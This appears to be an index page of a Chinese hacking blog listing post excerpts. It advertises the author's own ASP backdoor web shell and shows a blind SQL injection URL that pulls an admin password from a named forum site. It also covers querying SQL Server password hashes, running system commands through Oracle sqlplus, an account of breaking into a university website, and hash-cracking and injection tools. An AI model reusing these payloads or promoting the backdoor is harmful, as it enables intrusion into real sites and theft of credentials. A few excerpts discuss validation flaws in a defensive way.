导航

心动吧黑客BLOG

自发研究:须要多维思想而且要想不可能为可能的人才能做到

[置顶] [原创]心动吧数据库防下载小工具

 这一个文章和我以前发布的一个文章正好成了一个对比(文章连接),如果上一次是茅。那么此次这个就是盾了.为什么这样说?请看一下上一篇的文章。因为上一次是直接修改数据库的防下载表而不会造成数据沉淀在数据库里面。那么换一个思想来讲。假设在数据库当中并没有这一个防下载表。但是却有防下载功能。

例图:

[置顶] 心动吧警告:除20080508外并未发布其他版本

 先要在此感谢evil的提醒,昨天(2009-3-11)时上网后。发现网上有很多新版本的SHELL发布。而且还声称是终结版(我自己都没把自己终结。倒被你终结了).而且采用了加密手段。。现在我将下载回来程序。。打开并分析一下。现在把报告给大家。请慎重使用。。。。

[置顶] [原创]2009-1-18发布新版◆心动吧asp在线◆

心动吧asp在线-不加密加强版-是市面上目前功能最强的.速度最好的一款asp后门

 此内部版修正了:关于无端口的sql连接出错.通用三种SQL连接方式

is_numeric()和intval()的安全隐患

明生注:此文章来源于二个网站的结合。。

is_numeric()常常用来在进行数据库查询时检测变量是否为数字或者数字字符串,如下面的代码片断:

...
$tid = isset($tid) && is_numeric($tid) ? $tid : 0;
$db->query("SELECT * FROM threads LIMIT $tid");
...

但is_numeric()不仅支持十进制数字,也支持如十六进制等其他进制的数字,比如提交:

        tid=0x1

执行上面的代码,报错了:

....

Database Password Hashes Cracking

 

#Trace: Sid总结的。补充的在留言里贴吧。

SQL Server 2000:-

SELECT password from master.dbo.sysxlogins where name='sa' 

0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341

2FD54D6119FFF04129A1D72E7C3194F7284A7F3A

 

0×0100- constant header

34767D5C- salt

0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash

2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash

....

oracle执行cmd

装了一个oracle db11g,于是想试一下网上流传的在sqlplus中执行cmd的一些命令,也不知怎么的,没一个好用的,可能是网上转来转去的转错了.不过有一个简单的执行cmd命令方法:

SQL> host net user

User accounts for \\PC-ATQHJ4UG1SDA

----------------------------------------------------------------------------

__vmware_user__          admin                    Administrator

ASPNET                   Guest                    IUSR_PC-ATQHJ4UG1SDA

IWAM_PC-ATQHJ4UG1SDA     SUPPORT_388945a0

The command completed successfully.

....

Yxbbs3.0 两个注入漏洞

影响版本:

Yxbbs3.0

漏洞描述:

yxbbs在用户注册时,会实时检测用户名是否已存在以及用户名是否合法,不过服务端在检测时,对用户提交数据检验不够,本来人性化的一个功能,引入了一个注入点。具体涉及文件See.asp,对用户提交的  name = unescape(Request("name")) 并未做任何检验。 测试URL:

http://www.yimxu.com/bbs/See.Asp?Action=CheckName&name=yxbbs' and (select top 1 asc(mid(password,1,1)) from yx_admin)>56 and '1'='1

.....

不让上传我偏偏传-绕过点限制

明生注:这一个文章虽然最后没有贴出代码来表明绕过限制的原理..感觉有点问题...哈哈一时想不出来。。先加上。以后想到补回来


适合读者:脚本入侵爱好者、脚本程序员

前置知识:基本ASP代码阅读能力

    近来忙着开发一个WAP手机网站,好几天都没有好好睡觉了,就是因为UTF_8转换为GB问题。网上虽然有现成的ASP脚本可以转换,但在转换过程中还是有些字符转换不了。无奈中在某个开发成功的WAP手机站页面中找到了一个技术人员的QQ,可惜在我诚心的请教下,他却说:“商业代码,不能公开!”。我无语,这算是高深的技术吗?难怪中国的技术进步得那么的缓慢,都是有了这一种保守派,不愿意和人分享技术成果而造成的。烦恼中……我突然谋生出了歪念,他不说给我听,还装神秘,好,你不说我就自己“进去”找吧!

...

trim()的漏洞破解与防护+文章始末

 

明生注:学习asp漏洞分析时。不要放过任何一章值得学习的文章

有下面的一段代码: 


<% dim name,title 
name=trim(request.form("name")) 
password=trim(request.form("password")) 
if name=""or password="" then response.redirect "error.asp?error=name&name=null"
myDSN="DSN=test;uid=test;pwd=test" 
set cn=server.createobject("adodb.connection") 
cn.open myDSN 
sql="insert into test(name,title) values('"&name&"','"&password&"')" 
cn.execute(sql) 
cn.close %> 

  使用了

....

用PHP来注入某大学生创业网

一、PHP注入缘由



  接触黑客技术也有一段时间了,不过想想以前搞的全是ASP的站,从来没有弄过PHP的网站!听说PHP注入也挺好玩的,所以决定学习一下。于是在看了几个PHP注入教程之后,找了些PHP的网站练练手。目标站初步确定为大学生创业网。



二、开始作战



    要入侵一个网站,当然首先是看看网站的结构了。打开大学生创业网的主页,可以明显看到是PHP的。主页上有N多PHP连接。随便打开一个,地址也挺诱人的,是那种经典的php?id=的页面。但是PHP注入和ASP注入虽不完全相同,但是判断是否存在注入的方法还是

....

phpass_crack: Simple tool for cracking Wordpress hashes

# Trace: 新版本的WordPress和phpbb已经弃用md5,采用phpass加密了(还有其他一些开源WEB程序)。原来DarkC0de上发布了一个phpass.py,是配合字典破解的,这个Phpass_Crack也是。PasswordsPro官方下载的最新版本也已经支持phpass的破解,有字典攻击和暴力破解等方式可选(选择md5(phpbb3) Modul)。

I have written a simple tool for cracking Portable PHP password hashes, which Wordpress uses to hash user passwords

.....

SQLiHelper 2.6注射器

别名:SQLiHelper 2.6 Injector and Dumper for MYSQL & ( added MSSQL support )

转自:TR博客

y0,

 sorry for the NO update, but got time last weekend and tried out the ODBC convert sql injection exploit for MSSQL and implemented it on sqli helper. easy to spot exploitable page, just add a qoute, if you get “Microsoft OLE DB Provider for SQL Server error ‘80040e07′” then its exploitable

 SQLI Helper for MYSQL and MSSQL

.....

web应用程序中的rootkit

Author: jianxin [80sec]

EMail: jianxin#80sec.com

Site: http://www.80sec.com

Date: 2009-3-28

From: http://www.80sec.com/release/webapp-rootkit.txt

[ 目录 ]

0×00 为什么我们会有这个想法

0×01 web应用程序中后门的基本思想

0×02 实际应用中的一些例子

.....

分页:[«]13[14][15][16][17][18][19][20][21][22][23][24][25][26][27][»]

日历

<< 2014-4 >>

Sun

Mon

Tue

Wed

Thu

Fri

Sat

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

站内搜索

Copyright ⊙ 2004-2009 心动吧 UrL:ABCXD.CoM All RiGhts Reserved